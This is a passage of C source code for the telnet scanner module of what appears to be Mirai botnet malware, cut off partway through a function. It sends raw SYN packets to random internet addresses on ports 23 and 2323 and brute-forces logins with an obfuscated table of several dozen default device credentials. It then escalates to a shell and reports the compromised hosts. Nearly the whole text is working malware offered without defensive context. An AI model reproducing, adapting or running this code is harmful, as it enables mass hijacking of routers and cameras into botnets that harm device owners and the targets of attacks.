#define _GNU_SOURCE#ifdef MIRAI_TELNET#ifdef DEBUG#include <stdio.h>

1. #define _GNU_SOURCE
2.  
3. #ifdef MIRAI_TELNET
4.  
5. #ifdef DEBUG
6. #include <stdio.h>
7. #endif
8. #include <unistd.h>
9. #include <stdlib.h>
10. #include <sys/socket.h>
11. #include <arpa/inet.h>
12. #include <sys/select.h>
13. #include <sys/types.h>
14. #include <time.h>
15. #include <fcntl.h>
16. #include <signal.h>
17. #include <errno.h>
18. #include <string.h>
19. #include <linux/ip.h>
20. #include <linux/tcp.h>
21.  
22. #include "includes.h"
23. #include "scanner.h"
24. #include "table.h"
25. #include "rand.h"
26. #include "util.h"
27. #include "checksum.h"
28. #include "resolv.h"
29.  
30. int scanner_pid, rsck, rsck_out, auth_table_len = 0;
31. char scanner_rawpkt[sizeof (struct iphdr) + sizeof (struct tcphdr)] = {0};
32. struct scanner_auth *auth_table = NULL;
33. struct scanner_connection *conn_table;
34. uint16_t auth_table_max_weight = 0;
35. uint32_t fake_time = 0;
36.  
37. int recv_strip_null(int sock, void *buf, int len, int flags)
38. {
39. int ret = recv(sock, buf, len, flags);
40.  
41. if (ret > 0)
42. {
43. int i = 0;
44.  
45. for(i = 0; i < ret; i++)
46. {
47. if (((char *)buf)[i] == 0x00)
48. {
49. ((char *)buf)[i] = 'A';
50. }
51. }
52. }
53.  
54. return ret;
55. }
56.  
57. void scanner_init(void)
58. {
59. int i;
60. uint16_t source_port;
61. struct iphdr *iph;
62. struct tcphdr *tcph;
63.  
64. // Let parent continue on main thread
65. scanner_pid = fork();
66. if (scanner_pid > 0 || scanner_pid == -1)
67. return;
68.  
69. LOCAL_ADDR = util_local_addr();
70.  
71. rand_init();
72. fake_time = time(NULL);
73. conn_table = calloc(SCANNER_MAX_CONNS, sizeof (struct scanner_connection));
74. for (i = 0; i < SCANNER_MAX_CONNS; i++)
75. {
76. conn_table[i].state = SC_CLOSED;
77. conn_table[i].fd = -1;
78. }
79.  
80. // Set up raw socket scanning and payload
81. if ((rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
82. {
83. #ifdef DEBUG
84. printf("[scanner] Failed to initialize raw socket, cannot scan\n");
85. #endif
86. exit(0);
87. }
88. fcntl(rsck, F_SETFL, O_NONBLOCK | fcntl(rsck, F_GETFL, 0));
89. i = 1;
90. if (setsockopt(rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof (i)) != 0)
91. {
92. #ifdef DEBUG
93. printf("[scanner] Failed to set IP_HDRINCL, cannot scan\n");
94. #endif
95. close(rsck);
96. exit(0);
97. }
98.  
99. do
100. {
101. source_port = rand_next() & 0xffff;
102. }
103. while (ntohs(source_port) < 1024);
104.  
105. iph = (struct iphdr *)scanner_rawpkt;
106. tcph = (struct tcphdr *)(iph + 1);
107.  
108. // Set up IPv4 header
109. iph->ihl = 5;
110. iph->version = 4;
111. iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr));
112. iph->id = rand_next();
113. iph->ttl = 64;
114. iph->protocol = IPPROTO_TCP;
115.  
116. // Set up TCP header
117. tcph->dest = htons(23);
118. tcph->source = source_port;
119. tcph->doff = 5;
120. tcph->window = rand_next() & 0xffff;
121. tcph->syn = TRUE;
122.  
123. // Set up passwords
124. add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10); // root xc3511
125. add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9); // root vizxv
126. add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8); // root admin
127. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7); // admin admin
128. add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6); // root 888888
129. add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5); // root xmhdipc
130. add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5); // root default
131. add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5); // root juantech
132. add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17\x14", 5); // root 123456
133. add_auth_entry("\x50\x4D\x4D\x56", "\x17\x16\x11\x10\x13", 5); // root 54321
134. add_auth_entry("\x51\x57\x52\x52\x4D\x50\x56", "\x51\x57\x52\x52\x4D\x50\x56", 5); // support support
135. add_auth_entry("\x50\x4D\x4D\x56", "", 4); // root (none)
136. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 4); // admin password
137. add_auth_entry("\x50\x4D\x4D\x56", "\x50\x4D\x4D\x56", 4); // root root
138. add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 4); // root 12345
139. add_auth_entry("\x57\x51\x47\x50", "\x57\x51\x47\x50", 3); // user user
140. add_auth_entry("\x43\x46\x4F\x4B\x4C", "", 3); // admin (none)
141. add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51", 3); // root pass
142. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C\x13\x10\x11\x16", 3); // admin admin1234
143. add_auth_entry("\x50\x4D\x4D\x56", "\x13\x13\x13\x13", 3); // root 1111
144. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x51\x4F\x41\x43\x46\x4F\x4B\x4C", 3); // admin smcadmin
145. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13", 2); // admin 1111
146. add_auth_entry("\x50\x4D\x4D\x56", "\x14\x14\x14\x14\x14\x14", 2); // root 666666
147. add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51\x55\x4D\x50\x46", 2); // root password
148. add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16", 2); // root 1234
149. add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11", 1); // root klv123
150. add_auth_entry("\x63\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x4F\x47\x4B\x4C\x51\x4F", 1); // Administrator admin
151. add_auth_entry("\x51\x47\x50\x54\x4B\x41\x47", "\x51\x47\x50\x54\x4B\x41\x47", 1); // service service
152. add_auth_entry("\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", "\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", 1); // supervisor supervisor
153. add_auth_entry("\x45\x57\x47\x51\x56", "\x45\x57\x47\x51\x56", 1); // guest guest
154. add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1); // guest 12345
155. add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1); // guest 12345
156. add_auth_entry("\x43\x46\x4F\x4B\x4C\x13", "\x52\x43\x51\x51\x55\x4D\x50\x46", 1); // admin1 password
157. add_auth_entry("\x43\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x13\x10\x11\x16", 1); // administrator 1234
158. add_auth_entry("\x14\x14\x14\x14\x14\x14", "\x14\x14\x14\x14\x14\x14", 1); // 666666 666666
159. add_auth_entry("\x1A\x1A\x1A\x1A\x1A\x1A", "\x1A\x1A\x1A\x1A\x1A\x1A", 1); // 888888 888888
160. add_auth_entry("\x57\x40\x4C\x56", "\x57\x40\x4C\x56", 1); // ubnt ubnt
161. add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11\x16", 1); // root klv1234
162. add_auth_entry("\x50\x4D\x4D\x56", "\x78\x56\x47\x17\x10\x13", 1); // root Zte521
163. add_auth_entry("\x50\x4D\x4D\x56", "\x4A\x4B\x11\x17\x13\x1A", 1); // root hi3518
164. add_auth_entry("\x50\x4D\x4D\x56", "\x48\x54\x40\x58\x46", 1); // root jvbzd
165. add_auth_entry("\x50\x4D\x4D\x56", "\x43\x4C\x49\x4D", 4); // root anko
166. add_auth_entry("\x50\x4D\x4D\x56", "\x58\x4E\x5A\x5A\x0C", 1); // root zlxx.
167. add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x54\x4B\x58\x5A\x54", 1); // root 7ujMko0vizxv
168. add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // root 7ujMko0admin
169. add_auth_entry("\x50\x4D\x4D\x56", "\x51\x5B\x51\x56\x47\x4F", 1); // root system
170. add_auth_entry("\x50\x4D\x4D\x56", "\x4B\x49\x55\x40", 1); // root ikwb
171. add_auth_entry("\x50\x4D\x4D\x56", "\x46\x50\x47\x43\x4F\x40\x4D\x5A", 1); // root dreambox
172. add_auth_entry("\x50\x4D\x4D\x56", "\x57\x51\x47\x50", 1); // root user
173. add_auth_entry("\x50\x4D\x4D\x56", "\x50\x47\x43\x4E\x56\x47\x49", 1); // root realtek
174. add_auth_entry("\x50\x4D\x4D\x56", "\x12\x12\x12\x12\x12\x12\x12\x12", 1); // root 00000000
175. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13\x13\x13\x13", 1); // admin 1111111
176. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16", 1); // admin 1234
177. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17", 1); // admin 12345
178. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x17\x16\x11\x10\x13", 1); // admin 54321
179. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17\x14", 1); // admin 123456
180. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // admin 7ujMko0admin
181. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x16\x11\x10\x13", 1); // admin 1234
182. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51", 1); // admin pass
183. add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x4F\x47\x4B\x4C\x51\x4F", 1); // admin meinsm
184. add_auth_entry("\x56\x47\x41\x4A", "\x56\x47\x41\x4A", 1); // tech tech
185. add_auth_entry("\x4F\x4D\x56\x4A\x47\x50", "\x44\x57\x41\x49\x47\x50", 1); // mother fucker
186.  
187.  
188. #ifdef DEBUG
189. printf("[scanner] Scanner process initialized. Scanning started.\n");
190. #endif
191.  
192. // Main logic loop
193. while (TRUE)
194. {
195. fd_set fdset_rd, fdset_wr;
196. struct scanner_connection *conn;
197. struct timeval tim;
198. int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;
199.  
200. // Spew out SYN to try and get a response
201. if (fake_time != last_spew)
202. {
203. last_spew = fake_time;
204.  
205. for (i = 0; i < SCANNER_RAW_PPS; i++)
206. {
207. struct sockaddr_in paddr = {0};
208. struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
209. struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
210.  
211. iph->id = rand_next();
212. iph->saddr = LOCAL_ADDR;
213. iph->daddr = get_random_ip();
214. iph->check = 0;
215. iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
216.  
217. if (i % 10 == 0)
218. {
219. tcph->dest = htons(2323);
220. }
221. else
222. {
223. tcph->dest = htons(23);
224. }
225. tcph->seq = iph->daddr;
226. tcph->check = 0;
227. tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr)), sizeof (struct tcphdr));
228.  
229. paddr.sin_family = AF_INET;
230. paddr.sin_addr.s_addr = iph->daddr;
231. paddr.sin_port = tcph->dest;
232.  
233. sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));
234. }
235. }
236.  
237. // Read packets from raw socket to get SYN+ACKs
238. last_avail_conn = 0;
239. while (TRUE)
240. {
241. int n;
242. char dgram[1514];
243. struct iphdr *iph = (struct iphdr *)dgram;
244. struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
245. struct scanner_connection *conn;
246.  
247. errno = 0;
248. n = recvfrom(rsck, dgram, sizeof (dgram), MSG_NOSIGNAL, NULL, NULL);
249. if (n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
250. break;
251.  
252. if (n < sizeof(struct iphdr) + sizeof(struct tcphdr))
253. continue;
254. if (iph->daddr != LOCAL_ADDR)
255. continue;
256. if (iph->protocol != IPPROTO_TCP)
257. continue;
258. if (tcph->source != htons(23) && tcph->source != htons(2323))
259. continue;
260. if (tcph->dest != source_port)
261. continue;
262. if (!tcph->syn)
263. continue;
264. if (!tcph->ack)
265. continue;
266. if (tcph->rst)
267. continue;
268. if (tcph->fin)
269. continue;
270. if (htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
271. continue;
272.  
273. conn = NULL;
274. for (n = last_avail_conn; n < SCANNER_MAX_CONNS; n++)
275. {
276. if (conn_table[n].state == SC_CLOSED)
277. {
278. conn = &conn_table[n];
279. last_avail_conn = n;
280. break;
281. }
282. }
283.  
284. // If there were no slots, then no point reading any more
285. if (conn == NULL)
286. break;
287.  
288. conn->dst_addr = iph->saddr;
289. conn->dst_port = tcph->source;
290. setup_connection(conn);
291. #ifdef DEBUG
292. printf("[scanner] FD%d Attempting to brute found IP %d.%d.%d.%d\n", conn->fd, iph->saddr & 0xff, (iph->saddr >> 8) & 0xff, (iph->saddr >> 16) & 0xff, (iph->saddr >> 24) & 0xff);
293. #endif
294. }
295.  
296. // Load file descriptors into fdsets
297. FD_ZERO(&fdset_rd);
298. FD_ZERO(&fdset_wr);
299. for (i = 0; i < SCANNER_MAX_CONNS; i++)
300. {
301. int timeout;
302.  
303. conn = &conn_table[i];
304. timeout = (conn->state > SC_CONNECTING ? 30 : 5);
305.  
306. if (conn->state != SC_CLOSED && (fake_time - conn->last_recv) > timeout)
307. {
308. #ifdef DEBUG
309. printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);
310. #endif
311. close(conn->fd);
312. conn->fd = -1;
313.  
314. // Retry
315. if (conn->state > SC_HANDLE_IACS) // If we were at least able to connect, try again
316. {
317. if (++(conn->tries) == 10)
318. {
319. conn->tries = 0;
320. conn->state = SC_CLOSED;
321. }
322. else
323. {
324. setup_connection(conn);
325. #ifdef DEBUG
326. printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
327. #endif
328. }
329. }
330. else
331. {
332. conn->tries = 0;
333. conn->state = SC_CLOSED;
334. }
335. continue;
336. }
337.  
338. if (conn->state == SC_CONNECTING)
339. {
340. FD_SET(conn->fd, &fdset_wr);
341. if (conn->fd > mfd_wr)
342. mfd_wr = conn->fd;
343. }
344. else if (conn->state != SC_CLOSED)
345. {
346. FD_SET(conn->fd, &fdset_rd);
347. if (conn->fd > mfd_rd)
348. mfd_rd = conn->fd;
349. }
350. }
351.  
352. tim.tv_usec = 0;
353. tim.tv_sec = 1;
354. nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);
355. fake_time = time(NULL);
356.  
357. for (i = 0; i < SCANNER_MAX_CONNS; i++)
358. {
359. conn = &conn_table[i];
360.  
361. if (conn->fd == -1)
362. continue;
363.  
364. if (FD_ISSET(conn->fd, &fdset_wr))
365. {
366. int err = 0, ret = 0;
367. socklen_t err_len = sizeof (err);
368.  
369. ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
370. if (err == 0 && ret == 0)
371. {
372. conn->state = SC_HANDLE_IACS;
373. conn->auth = random_auth_entry();
374. conn->rdbuf_pos = 0;
375. #ifdef DEBUG
376. printf("[scanner] FD%d connected. Trying %s:%s\n", conn->fd, conn->auth->username, conn->auth->password);
377. #endif
378. }
379. else
380. {
381. #ifdef DEBUG
382. printf("[scanner] FD%d error while connecting = %d\n", conn->fd, err);
383. #endif
384. close(conn->fd);
385. conn->fd = -1;
386. conn->tries = 0;
387. conn->state = SC_CLOSED;
388. continue;
389. }
390. }
391.  
392. if (FD_ISSET(conn->fd, &fdset_rd))
393. {
394. while (TRUE)
395. {
396. int ret;
397.  
398. if (conn->state == SC_CLOSED)
399. break;
400.  
401. if (conn->rdbuf_pos == SCANNER_RDBUF_SIZE)
402. {
403. memmove(conn->rdbuf, conn->rdbuf + SCANNER_HACK_DRAIN, SCANNER_RDBUF_SIZE - SCANNER_HACK_DRAIN);
404. conn->rdbuf_pos -= SCANNER_HACK_DRAIN;
405. }
406. errno = 0;
407. ret = recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
408. if (ret == 0)
409. {
410. #ifdef DEBUG
411. printf("[scanner] FD%d connection gracefully closed\n", conn->fd);
412. #endif
413. errno = ECONNRESET;
414. ret = -1; // Fall through to closing connection below
415. }
416. if (ret == -1)
417. {
418. if (errno != EAGAIN && errno != EWOULDBLOCK)
419. {
420. #ifdef DEBUG
421. printf("[scanner] FD%d lost connection\n", conn->fd);
422. #endif
423. close(conn->fd);
424. conn->fd = -1;
425.  
426. // Retry
427. if (++(conn->tries) >= 10)
428. {
429. conn->tries = 0;
430. conn->state = SC_CLOSED;
431. }
432. else
433. {
434. setup_connection(conn);
435. #ifdef DEBUG
436. printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
437. #endif
438. }
439. }
440. break;
441. }
442. conn->rdbuf_pos += ret;
443. conn->last_recv = fake_time;
444.  
445. while (TRUE)
446. {
447. int consumed = 0;
448.  
449. switch (conn->state)
450. {
451. case SC_HANDLE_IACS:
452. if ((consumed = consume_iacs(conn)) > 0)
453. {
454. conn->state = SC_WAITING_USERNAME;
455. #ifdef DEBUG
456. printf("[scanner] FD%d finished telnet negotiation\n", conn->fd);
457. #endif
458. }
459. break;
460. case SC_WAITING_USERNAME:
461. if ((consumed = consume_user_prompt(conn)) > 0)
462. {
463. send(conn->fd, conn->auth->username, conn->auth->username_len, MSG_NOSIGNAL);
464. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
465. conn->state = SC_WAITING_PASSWORD;
466. #ifdef DEBUG
467. printf("[scanner] FD%d received username prompt\n", conn->fd);
468. #endif
469. }
470. break;
471. case SC_WAITING_PASSWORD:
472. if ((consumed = consume_pass_prompt(conn)) > 0)
473. {
474. #ifdef DEBUG
475. printf("[scanner] FD%d received password prompt\n", conn->fd);
476. #endif
477.  
478. // Send password
479. send(conn->fd, conn->auth->password, conn->auth->password_len, MSG_NOSIGNAL);
480. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
481.  
482. conn->state = SC_WAITING_PASSWD_RESP;
483. }
484. break;
485. case SC_WAITING_PASSWD_RESP:
486. if ((consumed = consume_any_prompt(conn)) > 0)
487. {
488. char *tmp_str;
489. int tmp_len;
490.  
491. #ifdef DEBUG
492. printf("[scanner] FD%d received shell prompt\n", conn->fd);
493. #endif
494.  
495. // Send enable / system / shell / sh to session to drop into shell if needed
496. table_unlock_val(TABLE_SCAN_ENABLE);
497. tmp_str = table_retrieve_val(TABLE_SCAN_ENABLE, &tmp_len);
498. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
499. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
500. table_lock_val(TABLE_SCAN_ENABLE);
501. conn->state = SC_WAITING_ENABLE_RESP;
502. }
503. break;
504. case SC_WAITING_ENABLE_RESP:
505. if ((consumed = consume_any_prompt(conn)) > 0)
506. {
507. char *tmp_str;
508. int tmp_len;
509.  
510. #ifdef DEBUG
511. printf("[scanner] FD%d received sh prompt\n", conn->fd);
512. #endif
513.  
514. table_unlock_val(TABLE_SCAN_SYSTEM);
515. tmp_str = table_retrieve_val(TABLE_SCAN_SYSTEM, &tmp_len);
516. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
517. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
518. table_lock_val(TABLE_SCAN_SYSTEM);
519.  
520. conn->state = SC_WAITING_SYSTEM_RESP;
521. }
522. break;
523. case SC_WAITING_SYSTEM_RESP:
524. if ((consumed = consume_any_prompt(conn)) > 0)
525. {
526. char *tmp_str;
527. int tmp_len;
528.  
529. #ifdef DEBUG
530. printf("[scanner] FD%d received sh prompt\n", conn->fd);
531. #endif
532.  
533. table_unlock_val(TABLE_SCAN_SHELL);
534. tmp_str = table_retrieve_val(TABLE_SCAN_SHELL, &tmp_len);
535. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
536. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
537. table_lock_val(TABLE_SCAN_SHELL);
538.  
539. conn->state = SC_WAITING_SHELL_RESP;
540. }
541. break;
542. case SC_WAITING_SHELL_RESP:
543. if ((consumed = consume_any_prompt(conn)) > 0)
544. {
545. char *tmp_str;
546. int tmp_len;
547.  
548. #ifdef DEBUG
549. printf("[scanner] FD%d received enable prompt\n", conn->fd);
550. #endif
551.  
552. table_unlock_val(TABLE_SCAN_SH);
553. tmp_str = table_retrieve_val(TABLE_SCAN_SH, &tmp_len);
554. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
555. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
556. table_lock_val(TABLE_SCAN_SH);
557.  
558. conn->state = SC_WAITING_SH_RESP;
559. }
560. break;
561. case SC_WAITING_SH_RESP:
562. if ((consumed = consume_any_prompt(conn)) > 0)
563. {
564. char *tmp_str;
565. int tmp_len;
566.  
567. #ifdef DEBUG
568. printf("[scanner] FD%d received sh prompt\n", conn->fd);
569. #endif
570.  
571. // Send query string
572. table_unlock_val(TABLE_SCAN_QUERY);
573. tmp_str = table_retrieve_val(TABLE_SCAN_QUERY, &tmp_len);
574. send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
575. send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
576. table_lock_val(TABLE_SCAN_QUERY);
577.  
578. conn->state = SC_WAITING_TOKEN_RESP;
579. }
580. break;
581. case SC_WAITING_TOKEN_RESP:
582. consumed = consume_resp_prompt(conn);
583. if (consumed == -1)
584. {
585. #ifdef DEBUG
586. printf("[scanner] FD%d invalid username/password combo\n", conn->fd);
587. #endif
588. close(conn->fd);
589. conn->fd = -1;
590.  
591. // Retry
592. if (++(conn->tries) == 10)
593. {
594. conn->tries = 0;
595. conn->state = SC_CLOSED;
596. }
597. else
598. {
599. setup_connection(conn);
600. #ifdef DEBUG
601. printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
602. #endif
603. }
604. }
605. else if (consumed > 0)
606. {
607. char *tmp_str;
608. int tmp_len;
609. #ifdef DEBUG
610. printf("[scanner] FD%d Found verified working telnet\n", conn->fd);
611. #endif
612. report_working(conn->dst_addr, conn->dst_port, conn->auth);
613. close(conn->fd);
614. conn->fd = -1;
615. conn->state = SC_CLOSED;
616. }
617. break;
618. default:
619. consumed = 0;
620. break;
621. }
622.  
623. // If no data was consumed, move on
624. if (consumed == 0)
625. break;
626. else
627. {
628. if (consumed > conn->rdbuf_pos)
629. consumed = conn->rdbuf_pos;
630.  
631. conn->rdbuf_pos -= consumed;
632. memmove(conn->rdbuf, conn->rdbuf + consumed, conn->rdbuf_pos);
633. }
634. }
635. }
636. }
637. }
638. }
639. }
640.  
641. void scanner_kill(void)
642. {
643. kill(scanner_pid, 9);
644. }
645.  
646. static void setup_connection(struct scanner_connection *conn)
647. {
648. struct sockaddr_in addr = {0};
649.  
650. if (conn->fd != -1)
651. close(conn->fd);
652. if ((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
653. {
654. #ifdef DEBUG
655. printf("[scanner] Failed to call socket()\n");
656. #endif
657. return;
658. }
659.  
660. conn->rdbuf_pos = 0;
661. util_zero(conn->rdbuf, sizeof(conn->rdbuf));
662.  
663. fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
664.  
665. addr.sin_family = AF_INET;
666. addr.sin_addr.s_addr = conn->dst_addr;
667. addr.sin_port = conn->dst_port;
668.  
669. conn->last_recv = fake_time;
670. conn->state = SC_CONNECTING;
671. connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
672. }
673.  
674. static ipv4_t get_random_ip(void)
675. {
676. uint32_t tmp;
677. uint8_t o1, o2, o3, o4;
678.  
679. do
680. {
681. tmp = rand_next();
682.  
683. o1 = tmp & 0xff;
684. o2 = (tmp >> 8) & 0xff;
685. o3 = (tmp >> 16) & 0xff;
686. o4 = (tmp >> 24) & 0xff;
687. }
688. while (o1 == 127 || // 127.0.0.0/8 - Loopback
689. (o1 == 0) || // 0.0.0.0/8 - Invalid address space
690. (o1 == 3) || // 3.0.0.0/8 - General Electric Company
691. (o1 == 15 || o1 == 16) || // 15.0.0.0/7 - Hewlett-Packard Company
692. (o1 == 56) || // 56.0.0.0/8 - US Postal Service
693. (o1 == 10) || // 10.0.0.0/8 - Internal network
694. (o1 == 192 && o2 == 168) || // 192.168.0.0/16 - Internal network
695. (o1 == 172 && o2 >= 16 && o2 < 32) || // 172.16.0.0/14 - Internal network
696. (o1 == 100 && o2 >= 64 && o2 < 127) || // 100.64.0.0/10 - IANA NAT reserved
697. (o1 == 169 && o2 > 254) || // 169.254.0.0/16 - IANA NAT reserved
698. (o1 == 198 && o2 >= 18 && o2 < 20) || // 198.18.0.0/15 - IANA Special use
699. (o1 >= 224) || // 224.*.*.*+ - Multicast
700. (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
701. );
702.  
703. return INET_ADDR(o1,o2,o3,o4);
704. }
705.  
706. static int consume_iacs(struct scanner_connection *conn)
707. {
708. int consumed = 0;
709. uint8_t *ptr = conn->rdbuf;
710.  
711. while (consumed < conn->rdbuf_pos)
712. {
713. int i;
714.  
715. if (*ptr != 0xff)
716. break;
717. else if (*ptr == 0xff)
718. {
719. if (!can_consume(conn, ptr, 1))
720. break;
721. if (ptr[1] == 0xff)
722. {
723. ptr += 2;
724. consumed += 2;
725. continue;
726. }
727. else if (ptr[1] == 0xfd)
728. {
729. uint8_t tmp1[3] = {255, 251, 31};
730. uint8_t tmp2[9] = {255, 250, 31, 0, 80, 0, 24, 255, 240};
731.  
732. if (!can_consume(conn, ptr, 2))
733. break;
734. if (ptr[2] != 31)
735. goto iac_wont;
736.  
737. ptr += 3;
738. consumed += 3;
739.  
740. send(conn->fd, tmp1, 3, MSG_NOSIGNAL);
741. send(conn->fd, tmp2, 9, MSG_NOSIGNAL);
742. }
743. else
744. {
745. iac_wont:
746.  
747. if (!can_consume(conn, ptr, 2))
748. break;
749.  
750. for (i = 0; i < 3; i++)
751. {
752. if (ptr[i] == 0xfd)
753. ptr[i] = 0xfc;
754. else if (ptr[i] == 0xfb)
755. ptr[i] = 0xfd;
756. }
757.  
758. send(conn->fd, ptr, 3, MSG_NOSIGNAL);
759. ptr += 3;
760. consumed += 3;
761. }
762. }
763. }
764.  
765. return consumed;
766. }
767.  
768. static int consume_any_prompt(struct scanner_connection *conn)
769. {
770. char *pch;
771. int i, prompt_ending = -1;
772.  
773. for (i = conn->rdbuf_pos - 1; i > 0; i--)
774. {
775. if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
776. {
777. prompt_ending = i + 1;
778. break;
779. }
780. }
781.  
782. if (prompt_ending == -1)
783. return 0;
784. else
785. return prompt_ending;
786. }
787.  
788. static int consume_user_prompt(struct scanner_connection *conn)
789. {
790. char *pch;
791. int i, prompt_ending = -1;
792.  
793. for (i = conn->rdbuf_pos - 1; i > 0; i--)
794. {
795. if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
796. {
797. prompt_ending = i + 1;
798. break;
799. }
800. }
801.  
802. if (prompt_ending == -1)
803. {
804. int tmp;
805.  
806. if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "ogin", 4)) != -1)
807. prompt_ending = tmp;
808. else if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "enter", 5)) != -1)
809. prompt_ending = tmp;
810. }
811.  
812. if (prompt_ending == -1)
813. return 0;
814. else
815. return prompt_ending;
816. }
817.  
818. static int consume_pass_prompt(struct scanner_connection *conn)
819. {
820. char *pch;
821. int i, prompt_ending = -1;
822.  
823. for (i = conn->rdbuf_pos - 1; i > 0; i--)
824. {
825. if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#')
826. {
827. prompt_ending = i + 1;
828. break;
829. }
830. }
831.  
832. if (prompt_ending == -1)
833. {
834. int tmp;
835.  
836. if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "assword", 7)) != -1)
837. prompt_ending = tmp;
838. }
839.  
840. if (prompt_ending == -1)
841. return 0;
842. else
843. return prompt_ending;
844. }
845.  
846. static int consume_resp_prompt(struct scanner_connection *conn)
847. {
848. char *tkn_resp;
849. int prompt_ending, len;
850.  
851. table_unlock_val(TABLE_SCAN_NCORRECT);
852. tkn_resp = table_retrieve_val(TABLE_SCAN_NCORRECT, &len);
